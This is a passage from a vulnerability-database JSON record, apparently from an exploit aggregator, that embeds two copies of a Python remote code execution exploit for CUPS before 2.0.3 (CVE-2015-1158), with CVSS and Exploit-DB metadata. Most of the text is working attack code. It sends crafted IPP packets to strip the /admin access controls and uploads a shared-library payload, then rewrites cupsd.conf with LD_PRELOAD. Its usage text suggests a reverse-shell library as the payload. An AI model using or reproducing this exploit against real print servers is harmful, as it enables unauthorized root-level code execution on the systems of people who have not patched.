\"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x16\" # val len: 22\r\n \"\\x00\\x06\" # length\r\n \"/admin\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n \r\n conf_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+2)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x1b\" # val len: 27\r\n \"\\x00\\x0b\" # length\r\n \"/admin/conf\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n \r\n http_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n http_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n pretty(\"*\",\"stomping ACL\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp)))\r\n time.sleep(1)\r\n pretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp)))\r\n \r\n http_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"checking /admin\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header_check))\r\n res = txrx(rhost,rport,\"tcp\",http_header_check)\r\n pretty(\"*\",\"<:\\n\" + createDump(res))\r\n m = re.search('200 OK', res)\r\n if m is not None:\r\n pretty(\"+\",\"ACL stomp successful\")\r\n else:\r\n pretty(\"-\",\"exploit failed\")\r\n exit(1)\r\n \r\n \r\ndef getConfig(rhost, rport):\r\n i = random.randint(1,1024)\r\n original_config = \"\"\r\n http_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n pretty(\"*\",\"grabbing configuration file....\")\r\n res = txrx(rhost,rport,\"tcp\",http_request)\r\n res_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\")\r\n original_config = res_array[1]\r\n pretty(\"*\",\"config:\\n\" + original_config + \"\\n\")\r\n return original_config\r\n \r\ndef putConfig(rhost, rport, config):\r\n http_request = (\"PUT /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Keep-Alive\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(config)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"overwriting config...\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_request + config))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_request + config)))\r\n \r\ndef poisonConfig(config, name):\r\n config = config + \"\\x0a\\x0aSetEnv LD_PRELOAD /var/spool/cups/d00\" + name + \"-001\\x0a\"\r\n return config\r\n \r\ndef main():\r\n rhost = None;\r\n noshell = None;\r\n options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])\r\n for opt, arg in options:\r\n if opt in ('-h', '--help'):\r\n usage()\r\n elif opt in ('-a','--rhost'):\r\n rhost = arg;\r\n elif opt in ('-b','--rport'):\r\n rport = arg;\r\n elif opt in ('-c','--lib'):\r\n libpath = arg;\r\n elif opt in ('-f','--stomp-only'):\r\n noshell = 1;\r\n banner()\r\n if rhost is None or rport is None:\r\n usage()\r\n pretty(\"*\",\"locate available printer\")\r\n printer = locatePrinters(rhost, rport)\r\n pretty(\"*\",\"stomp ACL\")\r\n stompACL(rhost, rport, printer)\r\n if (noshell is not None):\r\n pretty(\"*\",\"fin\")\r\n exit(0)\r\n pretty(\"*\",\"prepare payload\")\r\n payload = preparePayload(libpath)\r\n pretty(\"*\",\"spray payload\")\r\n jobid = seedTarget(rhost, rport, printer, payload)\r\n pretty(\"*\",\"grab original config\")\r\n OG_config = getConfig(rhost, rport)\r\n pretty(\"*\",\"generate poison config\")\r\n evil_config = poisonConfig(OG_config, jobid)\r\n pretty(\"*\",\"upload poison config\")\r\n putConfig(rhost, rport, evil_config)\r\n pretty(\"*\",\"fin\")\r\n exit(0);\r\n \r\nif __name__ == \"__main__\":\r\n main()\n\n# 0day.today [2018-01-08] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/26891"}], "exploitdb": [{"lastseen": "2017-02-03T08:59:45", "osvdbidlist": [], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "CUPS < 2.0.3 - Remote Command Execution. CVE-2015-1158. Remote exploit for Linux platform", "reporter": "Exploit-DB", "published": "2017-02-03T00:00:00", "type": "exploitdb", "title": "CUPS < 2.0.3 - Remote Command Execution", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2017-02-03T00:00:00", "id": "EDB-ID:41233", "href": "https://www.exploit-db.com/exploits/41233/", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution\r\n# Google Dork: n/a\r\n# Date: 2/2/17\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: cups.org\r\n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2\r\n# Version: <2.0.3\r\n# Tested on: Ubuntu 14/15\r\n# CVE : CVE-2015-1158\r\nimport os, re, socket, random, time, getopt, sys\r\nfrom socket import *\r\nfrom struct import *\r\n\r\ndef banner():\r\n print '''\r\n lol ty google\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\ngithub.com/0x00string/oldays/CVE-2015-1158.py\r\n'''\r\n\r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target IPP service port\\n\"\r\n \" -c, --lib /path/to/payload.so\\n\"\r\n \" -f, --stomp-only Only stomp the ACL (no postex)\\n\"\r\n \"\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -f\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\")\r\n exit()\r\n\r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n\r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n\r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n\r\n return d\r\n\r\nclass tcpsock:\r\n def __init__(self, sock=None):\r\n if sock is None:\r\n self.sock = socket(\r\n AF_INET, SOCK_STREAM)\r\n self.sock.settimeout(30)\r\n else:\r\n self.sock = sock\r\n def connect(self, host, port):\r\n self.sock.connect((host, int(port)))\r\n def tx(self, msg):\r\n self.sock.send(msg)\r\n def rx(self):\r\n tmp = self.sock.recv(1024)\r\n msg = \"\"\r\n while tmp:\r\n msg += tmp\r\n tmp = self.sock.recv(1024)\r\n return msg\r\n\r\ndef txrx (ip, port, proto, txpacket):\r\n if (proto is \"tcp\"):\r\n sock = tcpsock()\r\n elif (proto is \"udp\"):\r\n sock = udpsock()\r\n else:\r\n return None\r\n sock.connect(ip, port)\r\n sock.tx(txpacket)\r\n rxpacket = sock.rx()\r\n return rxpacket\r\n\r\ndef locatePrinters(rhost, rport=\"631\"):\r\n request = ( \"GET /printers HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n response = txrx(rhost, int(rport), \"tcp\", request)\r\n if response is not None:\r\n m = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)\r\n if m is not None:\r\n printer = m.group(1)\r\n pretty(\"+\",\"printer found: \" + printer)\r\n else:\r\n pretty(\"-\",\"no printers\")\r\n exit(1)\r\n return printer\r\n\r\ndef preparePayload(libpath):\r\n with open(libpath, 'rb') as f:\r\n payload = f.read()\r\n if payload is not None:\r\n pretty(\"*\",\"Payload:\\n\" + createDump(payload))\r\n else:\r\n pretty(\"-\",\"something went wrong\")\r\n usage()\r\n return payload\r\n\r\ndef seedTarget(rhost, rport, printer, payload):\r\n i = random.randint(1,3)\r\n reqid = str(pack(\">i\",(i+2)))\r\n reqid2 = str(pack(\">i\",(i+3)))\r\n printer_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer\r\n\r\n create_job_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x05\"+\r\n reqid+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x02\"\r\n \"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\"\r\n \"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\"\r\n \"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\"\r\n \"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\"\r\n \"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\"\r\n \"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x03\")\r\n pretty(\"*\",\"Sending createJob\")\r\n\r\n http_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n createJobRequest = http_header1 + create_job_packet\r\n blah = txrx(rhost,int(rport),\"tcp\",createJobRequest)\r\n if blah is not None:\r\n m = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah)\r\n if m is not None:\r\n jobid = m.group(1)\r\n else:\r\n pretty(\"-\",\"something went wrong\");\r\n exit()\r\n\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\", \"Sending sendJob\")\r\n\r\n send_document_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x06\"+\r\n reqid2+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\"\r\n \"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\"\r\n \"\\x03\"+\r\n payload)\r\n\r\n http_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(send_document_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n sendJobRequest = http_header2 + send_document_packet\r\n blah2 = txrx(\"172.20.32.3\",631,\"tcp\",sendJobRequest)\r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\",\"job id: \" + jobid)\r\n return jobid\r\n\r\ndef stompACL(rhost, rport, printer):\r\n i = random.randint(1,1024)\r\n printer_url = \"ipp://\" + rhost + \":\" + rport + printer\r\n\r\n admin_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+1)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x06\" # val len: 6\r\n \"/admin\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x16\" # val len: 22\r\n \"\\x00\\x06\" # length\r\n \"/admin\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n\r\n conf_stomp = (\"\\x02\\x00\" # vers 2.0\r\n \"\\x00\\x05\"+ # op id: Create Job (0x0005)\r\n str(pack(\">i\",(i+2)))+\r\n \"\\x01\" # op attributes marker\r\n \"\\x47\" # charset\r\n \"\\x00\\x12\" # name len: 18\r\n \"attributes-charset\"\r\n \"\\x00\\x08\" # val len: 8\r\n \"us-ascii\"\r\n \"\\x48\" # natural language\r\n \"\\x00\\x1b\" # name len: 27\r\n \"attributes-natural-language\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x45\" # printer-uri\r\n \"\\x00\\x0b\" # name len 11\r\n \"printer-uri\" +\r\n str(pack(\">h\", len(printer_url))) + printer_url +\r\n \"\\x42\" # name without lang\r\n \"\\x00\\x14\" # name len: 20\r\n \"requesting-user-name\"\r\n \"\\x00\\x0b\" # val len: 11\r\n \"/admin/conf\"\r\n \"\\x02\" # job attrs marker\r\n \"\\x21\" # integer\r\n \"\\x00\\x06\" # name len: 6\r\n \"copies\"\r\n \"\\x00\\x04\" # val len: 4\r\n \"\\x00\\x00\\x00\\x01\" # 1\r\n \"\\x42\" # name w/o lang\r\n \"\\x00\\x19\" # name len: 25\r\n \"job-originating-host-name\"\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x42\" # nwol\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x0c\" # val len: 12\r\n \"AAAAAAAAAAAA\"\r\n \"\\x36\" # nwl\r\n \"\\x00\\x00\" # name len: 0\r\n \"\\x00\\x1b\" # val len: 27\r\n \"\\x00\\x0b\" # length\r\n \"/admin/conf\"\r\n \"\\x00\\x0c\"\r\n \"BBBBBBBBBBBB\"\r\n \"\\x03\") # end of attributes\r\n\r\n http_header1 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(admin_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n http_header2 = (\"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(conf_stomp)) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n pretty(\"*\",\"stomping ACL\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header1 + admin_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header1 + admin_stomp)))\r\n time.sleep(1)\r\n pretty(\"*\",\">:\\n\" + createDump(http_header2 + conf_stomp))\r\n pretty(\"*\",\"<:\\n\" + createDump(txrx(rhost,rport,\"tcp\",http_header2 + conf_stomp)))\r\n\r\n http_header_check = (\"GET /admin HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n pretty(\"*\",\"checking /admin\")\r\n pretty(\"*\",\">:\\n\" + createDump(http_header_check))\r\n res = txrx(rhost,rport,\"tcp\",http_header_check)\r\n pretty(\"*\",\"<:\\n\" + createDump(res))\r\n m = re.search('200 OK', res)\r\n if m is not None:\r\n pretty(\"+\",\"ACL stomp successful\")\r\n else:\r\n pretty(\"-\",\"exploit failed\")\r\n exit(1)\r\n\r\n\r\ndef getConfig(rhost, rport):\r\n i = random.randint(1,1024)\r\n original_config = \"\"\r\n http_request = (\"GET /admin/conf/cupsd.conf HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n\r\n pretty(\"*\",\"grabbing configuration file....\")\r\n res = txrx(rhost,rport,\"tcp\",http_request)\r\n res_array = res.split(\"\\x0d\\x0a\\x0d\\x0a\")\r\n original_config = res_array[1]\r\n pretty(\"*\",\"config:\\n\" + 